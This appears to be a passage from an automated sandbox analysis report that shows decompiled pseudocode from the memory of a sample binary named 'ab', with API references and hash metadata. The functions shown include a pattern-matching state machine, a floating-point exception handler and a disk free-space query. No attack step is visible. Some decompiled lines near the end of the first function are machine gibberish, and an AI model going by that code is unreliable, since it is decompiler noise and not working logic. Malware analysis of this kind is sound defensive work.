                          											_t182 = _t192 & 0xffffff00 | __eflags != 0x00000000;
                          											_v44 = _t182;
                          										} else {
                          											 *(__edi + 0x60) =  *(__edi + 0x60) >> 1;
                          											__al = __al & 0x00000001;
                          											_v44 =  *(__edi + 0x60) >> 1;
                          										}
                          										goto L23;
                          									case 3:
                          										__ecx = __edi;
                          										__eax = E012FFB80(__edi);
                          										__ecx =  *(__esi + 8);
                          										__ecx =  *(__esi + 8) & 0x00000001;
                          										__eflags = __al - __cl;
                          										_v44 = __eax;
                          										goto L23;
                          									case 4:
                          										__eax =  *__edi;
                          										__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
                          										if(__eax ==  *((intOrPtr*)(__edi + 0x50))) {
                          											goto L65;
                          										} else {
                          											__ecx =  *__eax & 0x0000ffff;
                          											__eflags = __ecx - 0xa;
                          											if(__ecx == 0xa) {
                          												goto L65;
                          											} else {
                          												__eflags = __ecx - 0xd;
                          												if(__eflags == 0) {
                          													goto L65;
                          												} else {
                          													__eax = __eax + 2;
                          													goto L21;
                          												}
                          											}
                          										}
                          										goto L75;
                          									case 5:
                          										__edx =  *(__esi + 0x1c);
                          										__ecx =  &_v68;
                          										 *(__esi + 0x18) = __edx +  *(__esi + 0x18) * 2;
                          										__eax = E012FE970(__ecx, __edx,  *__edi,  *((intOrPtr*)(__edi + 0x50)), __edx +  *(__esi + 0x18) * 2,  *(__edi + 0x70),  *((intOrPtr*)(__edi + 0x5c)));
                          										goto L20;
                          									case 6:
                          										__eax =  *__edi;
                          										__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
                          										if( *__edi ==  *((intOrPtr*)(__edi + 0x50))) {
                          											goto L65;
                          										} else {
                          											__ecx = __edi;
                          											__eax = E012FF8F0(__ebx, __ecx, __edi, __esi);
                          											__eflags = __al;
                          											if(__eflags == 0) {
                          												goto L65;
                          											} else {
                          												__al = 0;
                          												_v44 = __eax;
                          												L24:
                          												if(_t208 == 0) {
                          													goto L66;
                          												} else {
                          													_t208 =  *((intOrPtr*)(_t208 + 0xc));
                          													_v48 = _t208;
                          													if(_t208 != 0) {
                          														goto L5;
                          													} else {
                          														goto L66;
                          													}
                          												}
                          											}
                          										}
                          										goto L75;
                          									case 7:
                          										__esi =  *__edi;
                          										__ecx = __edi + 4;
                          										__eflags = __edx - 0xb;
                          										_v24 = 0;
                          										__edx =  *__ecx;
                          										asm("xorps xmm0, xmm0");
                          										_v49 = __eflags == 0;
                          										_v60 = __edx;
                          										__eax = 0;
                          										asm("movups [ebp-0x24], xmm0");
                          										_v56 = 0;
                          										_v28 = 0;
                          										__eax =  *(__ecx + 4);
                          										_v40 = __esi;
                          										_v36 = 0;
                          										_v32 = 0;
                          										_v64 = __eax;
                          										__eflags = __edx - __eax;
                          										if(__edx == __eax) {
                          											L33:
                          											__eax =  *(__ecx + 0xc);
                          											_v24 =  *(__ecx + 0xc);
                          											__eax = _v48;
                          											__ecx = __edi;
                          											_v8 = 0;
                          											__eax = E012FE4A0(__ebx, __edi, __edi, __esi,  *((intOrPtr*)(_v48 + 0x14)));
                          											 *__edi = __esi;
                          											__eflags = __al - _v49;
                          											if(__al != _v49) {
                          												__eax = _v44;
                          												__ecx = _v56;
                          											} else {
                          												__eax =  &_v36;
                          												__ecx = __edi + 4;
                          												__eax = E012FF010(__ebx, __edi + 4, __edi, __esi,  &_v36);
                          												__ecx = _v28;
                          												__eax = 1;
                          												_v44 = 1;
                          											}
                          											_v8 = 0xffffffff;
                          											__edx = _v36;
                          											__eflags = __edx;
                          											if(__eflags == 0) {
                          												__esi = _v48;
                          											} else {
                          												__ecx = __ecx - __edx;
                          												__ecx = __ecx & 0xfffffffc;
                          												__eflags = __ecx;
                          												_push(__ecx);
                          												__eax = E012F56A0(__ebx, __edi, __edx);
                          												_v36 = 0;
                          												_v32 = 0;
                          												_v28 = 0;
                          												goto L38;
                          											}
                          											goto L23;
                          										} else {
                          											__eax = __eax - __edx;
                          											__eax = __eax >> 2;
                          											_v56 = __eax;
                          											__eflags = __eax - 0x3fffffff;
                          											if(__eax > 0x3fffffff) {
                          												goto L73;
                          											} else {
                          												__eflags = __eax;
                          												__eax = E012F57D0(__ebx, __edx, __edi, __eax);
                          												__edx = _v64;
                          												__ecx = __eax;
                          												__eax = _v56;
                          												_v36 = __ecx;
                          												__eax = __ecx + _v56 * 4;
                          												__ecx = _v60;
                          												_v56 = __eax;
                          												_v28 = __eax;
                          												_v32 = E01300D50(_v60, _v64, __eflags, _v60);
                          												__ecx = __edi + 4;
                          												goto L33;
                          											}
                          										}
                          										goto L75;
                          									case 8:
                          										L51:
                          										__esi = 0;
                          										goto L23;
                          									case 9:
                          										__edx =  *(__esi + 0x14);
                          										__ecx =  *(__edi + 0x14);
                          										__eax =  *__edi;
                          										 *(__ecx + __edx * 8) =  *__edi;
                          										__eax = _v48;
                          										__esi =  *(__edi + 0x10);
                          										__eflags =  *((intOrPtr*)(_v48 + 0x14)) - __esi;
                          										if(__eflags >= 0) {
                          											L38:
                          											__esi = _v48;
                          										} else {
                          											do {
                          												__ecx =  *(__edi + 4);
                          												__esi = __esi - 1;
                          												__eax = E012F5800( *(__edi + 4));
                          												__esi = __esi >> 5;
                          												__edx = __eax + (__esi >> 5) * 4;
                          												__ecx = __esi;
                          												__eax =  *__edx;
                          												__ecx = __esi & 0x0000001f;
                          												asm("btr eax, ecx");
                          												__eax = _v48;
                          												__eflags =  *((intOrPtr*)(__eax + 0x14)) - __esi;
                          											} while (__eflags < 0);
                          											__esi = __eax;
                          										}
                          										goto L22;
                          									case 0xa:
                          										__eflags =  *((char*)(__edi + 0x65));
                          										__ecx =  *(__esi + 0x14);
                          										_v60 = __ecx;
                          										if(__eflags != 0) {
                          											L45:
                          											__edx =  *(__ecx + 0x14);
                          											__ecx =  *(__edi + 4);
                          											__eax = E012F5800( *(__edi + 4));
                          											__ecx = __edx;
                          											__edx = __edx & 0x0000001f;
                          											__ecx = __ecx >> 5;
                          											__ecx = __eax + __ecx * 4;
                          											__eax =  *__ecx;
                          											asm("bts eax, edx");
                          											__edx = _v60;
                          											__ecx =  *(__edi + 0x14);
                          											__eax =  *__edi;
                          											__edx =  *(_v60 + 0x14);
                          											 *(__ecx + 4 + __edx * 8) =  *__edi;
                          											goto L22;
                          										} else {
                          											__eflags =  *(__ecx + 0x14);
                          											if(__eflags != 0) {
                          												goto L45;
                          											}
                          										}
                          										goto L23;
                          									case 0xb:
                          										__edx =  *(__esi + 0x14);
                          										__ecx =  *(__edi + 4);
                          										__eax = E012F5800( *(__edi + 4));
                          										__ecx =  *(__esi + 0x14);
                          										__edx =  *(__esi + 0x14) >> 5;
                          										__ecx =  *(__esi + 0x14) & 0x0000001f;
                          										__edx = __eax + ( *(__esi + 0x14) >> 5) * 4;
                          										1 = 1 << __cl;
                          										__eflags =  *__edx & 0x00000001 << __cl;
                          										if(__eflags == 0) {
                          											L22:
                          											__eax = _v44;
                          											goto L23;
                          										} else {
                          											__ecx =  *(__edi + 0x14);
                          											__edx =  *(__esi + 0x14);
                          											__eax =  *__edi;
                          											__edx =  *(__edi + 0x14) +  *(__esi + 0x14) * 8;
                          											__ecx =  *__edx;
                          											__edx =  *(__edx + 4);
                          											__eflags = __ecx - __edx;
                          											if(__eflags == 0) {
                          												L21:
                          												 *__edi = __eax;
                          												goto L22;
                          											} else {
                          												__edx =  *(__edi + 0x70);
                          												__ecx =  &_v72;
                          												__eax = E012FFBF0(__ecx, __edx, __eax,  *((intOrPtr*)(__edi + 0x50)), __ecx, __edx,  *((intOrPtr*)(__edi + 0x5c)));
                          												L20:
                          												__eax =  *__eax;
                          												__esp = __esp + 0x14;
                          												__eflags = __eax -  *__edi;
                          												if(__eflags == 0) {
                          													L65:
                          													_v44 = 1;
                          													L66:
                          													_t198 =  *(_t205 + 0x7c);
                          													goto L67;
                          												} else {
                          													goto L21;
                          												}
                          											}
                          										}
                          										goto L75;
                          									case 0xc:
                          										__ecx = __edi;
                          										__eax = E012FF550(__ebx, __edi, __edx, __edi, __eflags, __esi);
                          										goto L50;
                          									case 0xd:
                          										__eax =  *(__esi + 8);
                          										__ecx = __edi;
                          										__eax =  *(__esi + 8) >> 1;
                          										__al = __al & 0x00000001;
                          										__al & 0x000000ff = E012FF720(__ebx, __edi, __edx, __edi, __esi, __al & 0x000000ff, 0);
                          										goto L50;
                          									case 0xe:
                          										__edx =  *(__esi + 0x14);
                          										__eflags =  *(__edx + 0x24);
                          										if(__eflags == 0) {
                          											__ecx =  *(__edx + 0x20);
                          											 *(__edi + 0x40) =  *(__edx + 8);
                          											__ecx = __edi;
                          											__eax =  *(__edx + 8) >> 1;
                          											__al = __al & 0x00000001;
                          											__al & 0x000000ff = E012FF720(__ebx, __edi, __edx, __edi, __edx, __al & 0x000000ff,  *((intOrPtr*)((__al & 0x000000ff) + __edi * 8)));
                          											L50:
                          											__edx = _v44;
                          											__eflags = __al;
                          											__eax = 1;
                          											__ecx = __dl & 0x000000ff;
                          											__ecx =  ==  ? 1 : __dl & 0x000000ff;
                          											__eflags = __ecx;
                          											__al = __cl;
                          											_v44 = 1;
                          										}
                          										goto L51;
                          									case 0xf:
                          										__eflags =  *(__edi + 0x60) & 0x00002020;
                          										if(( *(__edi + 0x60) & 0x00002020) == 0) {
                          											L57:
                          											__eflags =  *((char*)(__edi + 0x74));
                          											if( *((char*)(__edi + 0x74)) == 0) {
                          												L60:
                          												__eflags =  *((char*)(__edi + 0x64));
                          												if( *((char*)(__edi + 0x64)) == 0) {
                          													L62:
                          													__ecx = __edi + 0x20;
                          													__eax = E012FEF10(__ebx, __ecx, __edi, __esi, __edi);
                          													 *((char*)(__edi + 0x64)) = 1;
                          												} else {
                          													__ecx = __edi;
                          													__eax = E012FFA80(__ebx, __ecx, __edi);
                          													__eflags = __al;
                          													if(__eflags != 0) {
                          														goto L62;
                          													}
                          												}
                          												__eax = _v44;
                          												__esi = 0;
                          											} else {
                          												__eax =  *__edi;
                          												__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
                          												if(__eflags == 0) {
                          													goto L60;
                          												} else {
                          													goto L59;
                          												}
                          											}
                          										} else {
                          											__eax =  *(__edi + 0x4c);
                          											__eflags = __eax -  *__edi;
                          											if(__eflags == 0) {
                          												L59:
                          												__al = 1;
                          												__esi = 0;
                          												_v44 = __eax;
                          											} else {
                          												goto L57;
                          											}
                          										}
                          										goto L23;
                          								}
                          							}
                          							_push(0xd);
                          							E01316C69(__eflags);
                          							goto L71;
                          						}
                          					} else {
                          						_t195 = _t181 - 1;
                          						 *((intOrPtr*)(_t205 + 0x78)) = _t195;
                          						if(_t195 <= 0) {
                          							goto L72;
                          						} else {
                          							goto L4;
                          						}
                          					}
                          				} else {
                          					_t198 = _t198 - 1;
                          					 *(__ecx + 0x7c) = _t198;
                          					if(_t198 <= 0) {
                          						L71:
                          						_push(0xc);
                          						E01316C69(__eflags);
                          						L72:
                          						_push(0xb);
                          						E01316C69(__eflags);
                          						L73:
                          						_t188 = E012F4A60();
                          						asm("into");
                          						asm("in eax, 0x2f");
                          						 *_t196 =  *_t196 + _t196;
                          						asm("in eax, 0x2f");
                          						 *((intOrPtr*)(_t188 - 0x1b)) =  *((intOrPtr*)(_t188 - 0x1b)) + _t203;
                          						asm("das");
                          						 *((intOrPtr*)(_t196 - 0x1b)) =  *((intOrPtr*)(_t196 - 0x1b)) + _t218;
                          						asm("das");
                          						 *((intOrPtr*)(_t203 - 0x1b)) =  *((intOrPtr*)(_t203 - 0x1b)) + _t205;
                          						asm("das");
                          						 *((intOrPtr*)(_t205 - 0xefed01b)) =  *((intOrPtr*)(_t205 - 0xefed01b)) + _t196;
                          						asm("in eax, 0x2f");
                          						asm("in eax, 0x2f");
                          						asm("in eax, 0x2f");
                          						 *_t196 =  *_t196 + _t203;
                          						asm("out 0x2f, al");
                          						 *_t196 =  *_t196 + _t203;
                          						asm("out 0x2f, al");
                          						 *_t205 =  *_t205 + _t203;
                          						0xe844ea65();
                          						asm("das");
                          						 *((intOrPtr*)(_t205 + 0x2f)) =  *((intOrPtr*)(_t205 + 0x2f)) + _t196;
                          						 *((intOrPtr*)(_t196 - 0x5fed019)) =  *((intOrPtr*)(_t196 - 0x5fed019)) + _t218;
                          						asm("out 0x2f, eax");
                          						asm("in eax, 0x2f");
                          						 *((intOrPtr*)(_t208 + _t198 + _t198 + _t198)) =  *((intOrPtr*)(_t208 + _t198 + _t198 + _t198)) + _t196;
                          						0xe964ea7d();
                          						asm("das");
                          						asm("in eax, 0x2f");
                          						 *((intOrPtr*)(_t188 + 0x2f + _t215 * 8)) =  *((intOrPtr*)(_t188 + 0x2f + _t215 * 8)) + _t196;
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						return  *((intOrPtr*)(_t198 + 0x68));
                          					} else {
                          						goto L2;
                          					}
                          				}
                          				L75:
                          			}


































                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 012FE8FF
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: c3dfc04e3a40ab8db81c6b8c695c982a5815d8373127760440b86f8d5dbc007a
                          • Instruction ID: cbcdadfd1f2a434bd277a842bc9b9fdda6888650ccd6b6ee3628fa072cfcaed1
                          • Opcode Fuzzy Hash: c3dfc04e3a40ab8db81c6b8c695c982a5815d8373127760440b86f8d5dbc007a
                          • Instruction Fuzzy Hash: 56E1A171A20616DFDB16DF68C494AADFBB2FF48310F16452DD612AB3A1E730E851CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01358C8F(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                          				signed int _t172;
                          				signed int _t175;
                          				signed int _t178;
                          				signed int* _t179;
                          				signed char _t193;
                          				signed int _t196;
                          				signed int _t200;
                          				signed int _t203;
                          				void* _t204;
                          				void* _t207;
                          				signed int _t210;
                          				void* _t211;
                          				signed int _t226;
                          				unsigned int* _t241;
                          				signed char _t243;
                          				signed int* _t251;
                          				unsigned int* _t257;
                          				signed int* _t258;
                          				signed char _t260;
                          				long _t263;
                          				signed int* _t266;
                          
                          				 *(_a4 + 4) = 0;
                          				_t263 = 0xc000000d;
                          				 *(_a4 + 8) = 0;
                          				 *(_a4 + 0xc) = 0;
                          				_t243 = _a12;
                          				if((_t243 & 0x00000010) != 0) {
                          					_t263 = 0xc000008f;
                          					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                          				}
                          				if((_t243 & 0x00000002) != 0) {
                          					_t263 = 0xc0000093;
                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                          				}
                          				if((_t243 & 0x00000001) != 0) {
                          					_t263 = 0xc0000091;
                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                          				}
                          				if((_t243 & 0x00000004) != 0) {
                          					_t263 = 0xc000008e;
                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                          				}
                          				if((_t243 & 0x00000008) != 0) {
                          					_t263 = 0xc0000090;
                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                          				}
                          				_t266 = _a8;
                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
                          				_t260 = E013592C5(_a4);
                          				if((_t260 & 0x00000001) != 0) {
                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                          				}
                          				if((_t260 & 0x00000004) != 0) {
                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                          				}
                          				if((_t260 & 0x00000008) != 0) {
                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                          				}
                          				if((_t260 & 0x00000010) != 0) {
                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                          				}
                          				if((_t260 & 0x00000020) != 0) {
                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                          				}
                          				_t172 =  *_t266 & 0x00000c00;
                          				if(_t172 == 0) {
                          					 *_a4 =  *_a4 & 0xfffffffc;
                          				} else {
                          					if(_t172 == 0x400) {
                          						_t258 = _a4;
                          						_t226 =  *_t258 & 0xfffffffd | 1;
                          						L26:
                          						 *_t258 = _t226;
                          						L29:
                          						_t175 =  *_t266 & 0x00000300;
                          						if(_t175 == 0) {
                          							_t251 = _a4;
                          							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
                          							L35:
                          							 *_t251 = _t178;
                          							L36:
                          							_t179 = _a4;
                          							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                          							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                          							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                          							if(_a28 == 0) {
                          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                          								 *((long long*)(_a4 + 0x10)) =  *_a20;
                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                          								_t255 = _a4;
                          								_t241 = _a24;
                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                          								 *(_a4 + 0x50) =  *_t241;
                          							} else {
                          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                          								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                          								_t241 = _a24;
                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                          								 *(_a4 + 0x50) =  *_t241;
                          							}
                          							E01359231(_t255);
                          							RaiseException(_t263, 0, 1,  &_a4);
                          							_t257 = _a4;
                          							_t193 = _t257[2];
                          							if((_t193 & 0x00000010) != 0) {
                          								 *_t266 =  *_t266 & 0xfffffffe;
                          								_t193 = _t257[2];
                          							}
                          							if((_t193 & 0x00000008) != 0) {
                          								 *_t266 =  *_t266 & 0xfffffffb;
                          								_t193 = _t257[2];
                          							}
                          							if((_t193 & 0x00000004) != 0) {
                          								 *_t266 =  *_t266 & 0xfffffff7;
                          								_t193 = _t257[2];
                          							}
                          							if((_t193 & 0x00000002) != 0) {
                          								 *_t266 =  *_t266 & 0xffffffef;
                          								_t193 = _t257[2];
                          							}
                          							if((_t193 & 0x00000001) != 0) {
                          								 *_t266 =  *_t266 & 0xffffffdf;
                          							}
                          							_t196 =  *_t257 & 0x00000003;
                          							if(_t196 == 0) {
                          								 *_t266 =  *_t266 & 0xfffff3ff;
                          							} else {
                          								_t207 = _t196 - 1;
                          								if(_t207 == 0) {
                          									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
                          									L55:
                          									 *_t266 = _t210;
                          									L58:
                          									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
                          									if(_t200 == 0) {
                          										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
                          										L64:
                          										 *_t266 = _t203;
                          										L65:
                          										if(_a28 == 0) {
                          											 *_t241 = _t257[0x14];
                          										} else {
                          											 *_t241 = _t257[0x14];
                          										}
                          										return _t203;
                          									}
                          									_t204 = _t200 - 1;
                          									if(_t204 == 0) {
                          										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
                          										goto L64;
                          									}
                          									_t203 = _t204 - 1;
                          									if(_t203 == 0) {
                          										 *_t266 =  *_t266 & 0xfffff3ff;
                          									}
                          									goto L65;
                          								}
                          								_t211 = _t207 - 1;
                          								if(_t211 == 0) {
                          									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
                          									goto L55;
                          								}
                          								if(_t211 == 1) {
                          									 *_t266 =  *_t266 | 0x00000c00;
                          								}
                          							}
                          							goto L58;
                          						}
                          						if(_t175 == 0x200) {
                          							_t251 = _a4;
                          							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
                          							goto L35;
                          						}
                          						if(_t175 == 0x300) {
                          							 *_a4 =  *_a4 & 0xffffffe3;
                          						}
                          						goto L36;
                          					}
                          					if(_t172 == 0x800) {
                          						_t258 = _a4;
                          						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
                          						goto L26;
                          					}
                          					if(_t172 == 0xc00) {
                          						 *_a4 =  *_a4 | 0x00000003;
                          					}
                          				}
                          			}
























                          0x01358e01
                          0x01358e0f
                          0x01358e17
                          0x00000000
                          0x01358e17
                          0x01358e05
                          0x01358e0a
                          0x01358e0a
                          0x00000000
                          0x01358e05
                          0x01358dc2
                          0x01358dd0
                          0x01358dd8
                          0x00000000
                          0x01358dd8
                          0x01358dc6
                          0x01358dcb
                          0x01358dcb
                          0x01358dc6

                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 01358EBC
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 0495d2365ff5521e47954c51c1428bbd8a0f41bf0fbe42d6c988625158e3eeeb
                          • Instruction ID: 5eb4eab7442cada14364bb92b0d7c39b1903c9b7c89d650b49e0c24908795891
                          • Opcode Fuzzy Hash: 0495d2365ff5521e47954c51c1428bbd8a0f41bf0fbe42d6c988625158e3eeeb
                          • Instruction Fuzzy Hash: DBB15A31210608DFEB55CF2DC486E657BE1FF49768F258698E99ACF2A1C335E981CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E01312230(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				short _v44;
                          				long _v48;
                          				long _v52;
                          				long _v56;
                          				long _v60;
                          				short _v68;
                          				unsigned int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				long _v84;
                          				char _v100;
                          				intOrPtr* _v104;
                          				signed int _v108;
                          				char _v128;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t105;
                          				signed int _t106;
                          				intOrPtr _t110;
                          				intOrPtr _t114;
                          				signed int _t116;
                          				signed int _t123;
                          				signed int _t127;
                          				intOrPtr _t130;
                          				signed int _t134;
                          				intOrPtr* _t139;
                          				void* _t141;
                          				intOrPtr _t149;
                          				signed int _t159;
                          				signed int _t162;
                          				intOrPtr* _t171;
                          				unsigned int _t172;
                          				unsigned int _t175;
                          				intOrPtr* _t177;
                          				signed int _t178;
                          				void* _t179;
                          				short* _t180;
                          				signed int _t181;
                          				void* _t182;
                          				void* _t183;
                          
                          				_t141 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1367bc5);
                          				_push( *[fs:0x0]);
                          				_t183 = _t182 - 0x70;
                          				_t105 =  *0x13a4018; // 0x39cca9f6
                          				_t106 = _t105 ^ _t181;
                          				_v20 = _t106;
                          				_push(__edi);
                          				_push(_t106);
                          				 *[fs:0x0] =  &_v16;
                          				_v104 = __ecx;
                          				_t171 = _a4;
                          				_t177 = _a8;
                          				asm("xorps xmm0, xmm0");
                          				_v84 = 0;
                          				_v80 = 7;
                          				_v100 = 0;
                          				asm("movlpd [ebp-0x48], xmm0");
                          				_v68 = 0;
                          				_v8 = 0;
                          				if( &_v100 == _t171) {
                          					L4:
                          					_t110 = _a12;
                          					asm("xorps xmm0, xmm0");
                          					_v68 = _t110;
                          					asm("movlpd [ebp-0x48], xmm0");
                          					_v56 = 0;
                          					_v52 = 0;
                          					_v60 = 0;
                          					_v48 = 0;
                          					_v28 = 0;
                          					_v24 = 7;
                          					_v44 = 0;
                          					_v8 = 1;
                          					if(_t110 != 1) {
                          						if(_t110 == 2 &&  &_v44 != _t177) {
                          							_t130 =  *((intOrPtr*)(_t177 + 0x10));
                          							if( *((intOrPtr*)(_t177 + 0x14)) >= 8) {
                          								_t177 =  *_t177;
                          							}
                          							_push(_t130);
                          							E012F51B0(_t141,  &_v44, _t171, _t177, _t177);
                          						}
                          					} else {
                          						_push(L":\\");
                          						_t180 = E012FC400(_t141,  &_v128, _t171, _t171);
                          						_t183 = _t183 + 4;
                          						if( &_v44 != _t180) {
                          							_t159 = _v24;
                          							if(_t159 >= 8) {
                          								_push(2 + _t159 * 2);
                          								E012F56A0(_t141, _t171, _v44);
                          								_t183 = _t183 + 8;
                          							}
                          							_v28 = 0;
                          							_v24 = 7;
                          							_v44 = 0;
                          							asm("movups xmm0, [esi]");
                          							asm("movups [ebp-0x28], xmm0");
                          							asm("movq xmm0, [esi+0x10]");
                          							asm("movq [ebp-0x18], xmm0");
                          							 *((intOrPtr*)(_t180 + 0x10)) = 0;
                          							 *(_t180 + 0x14) = 7;
                          							 *_t180 = 0;
                          						}
                          						_t134 = _v108;
                          						if(_t134 >= 8) {
                          							_push(2 + _t134 * 2);
                          							E012F56A0(_t141, _t171, _v128);
                          							_t183 = _t183 + 8;
                          						}
                          					}
                          					_t112 =  >=  ? _v44 :  &_v44;
                          					if(GetDiskFreeSpaceW( >=  ? _v44 :  &_v44,  &_v56,  &_v52,  &_v60,  &_v48) == 0) {
                          						_t172 = _v72;
                          						_t162 = _v76;
                          					} else {
                          						_t123 = _v48;
                          						_t127 = _t123 * _v52;
                          						_t175 = (_t123 * _v52 >> 0x20) * _v56 + (_t127 * _v56 >> 0x20);
                          						_t162 = (_t175 << 0x00000020 | _t127 * _v56) >> 0x1e;
                          						_t172 = _t175 >> 0x1e;
                          						_v76 = _t162;
                          						_v72 = _t172;
                          					}
                          					_t149 =  *_v104;
                          					_v104 = _t149;
                          					_t114 =  *((intOrPtr*)(_t149 + 4));
                          					if(_t114 ==  *((intOrPtr*)(_t149 + 8))) {
                          						E01314930(_t141, _t149, _t114,  &_v100);
                          						_t178 = _v80;
                          					} else {
                          						asm("movups xmm0, [ebp-0x60]");
                          						_t178 = 7;
                          						_v100 = 0;
                          						asm("movups [eax], xmm0");
                          						asm("movq xmm0, [ebp-0x50]");
                          						asm("movq [eax+0x10], xmm0");
                          						 *(_t114 + 0x18) = _t162;
                          						 *(_t114 + 0x1c) = _t172;
                          						 *((intOrPtr*)(_t114 + 0x20)) = _a12;
                          						 *((intOrPtr*)(_v104 + 4)) =  *((intOrPtr*)(_v104 + 4)) + 0x28;
                          					}
                          					_t116 = _v24;
                          					if(_t116 >= 8) {
                          						_push(2 + _t116 * 2);
                          						E012F56A0(_t141, _t172, _v44);
                          						_t183 = _t183 + 8;
                          					}
                          					_v28 = 0;
                          					_v24 = 7;
                          					_v44 = 0;
                          					if(_t178 >= 8) {
                          						_push(2 + _t178 * 2);
                          						E012F56A0(_t141, _t172, _v100);
                          					}
                          					 *[fs:0x0] = _v16;
                          					_pop(_t179);
                          					return E0132EA79(_v20 ^ _t181, _t179);
                          				}
                          				_t139 = _t171;
                          				if( *((intOrPtr*)(_t171 + 0x14)) >= 8) {
                          					_t139 =  *_t171;
                          				}
                          				_push( *((intOrPtr*)(_t171 + 0x10)));
                          				E012F51B0(_t141,  &_v100, _t171, _t177, _t139);
                          				goto L4;
                          			}

                          APIs
                          • GetDiskFreeSpaceW.KERNEL32(?,00000000,00000000,00000000,00000000,39CCA9F6,?,00000000), ref: 013123AF
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: DiskFreeSpace
                          • String ID:
                          • API String ID: 1705453755-0
